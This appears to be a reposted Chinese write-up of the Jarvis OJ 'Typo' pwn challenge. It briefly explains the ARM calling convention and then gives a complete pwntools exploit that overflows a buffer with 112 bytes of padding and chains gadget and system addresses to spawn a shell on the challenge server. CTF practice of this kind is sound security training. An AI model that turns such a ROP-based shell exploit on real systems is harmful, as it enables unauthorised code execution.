[Jarvis OJ - PWN]——Typo(内涵peak小知识)
生活随笔
收集整理的這篇文章主要介紹了
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
[Jarvis OJ - PWN]——Typo
- 題目地址: https://www.jarvisoj.com/challenges
- 題目:
還是先check一下, 是arm架構(gòu)。還是第一次遇到。
peak小知識(shí)
和x86架構(gòu)不同, arm架構(gòu)arm 下的函數(shù)調(diào)用規(guī)定, 函數(shù)的第 1 ~ 4 個(gè)參數(shù)分別保存在 r0 ~ r3 寄存器中, 剩下的參數(shù)從右向左依次入棧, 被調(diào)用者實(shí)現(xiàn)棧平衡,函數(shù)的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令實(shí)現(xiàn)跳轉(zhuǎn); pc 寄存器相當(dāng)于 x86 的 eip,保存下一條指令的地址
在IDA中, 可能沒辦法F5, 自己調(diào)試一下就好。
exploit
from pwn import * binsh_addr = 0x0006C384 p = remote("pwn2.jarvisoj.com", 9888, timeout = 2) p.sendafter("quit\n", "\n") p.recvline()payload = 'a' * 112 + p32(0x20904) + p32(binsh_addr) * 2 + p32(0x110B4) p.sendlineafter("\n", payload) p.interactive()總結(jié)
以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——Typo(内涵peak小知识)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: mmap mprotect详解
- 下一篇: 简单易懂的 pwnable.kr 第六题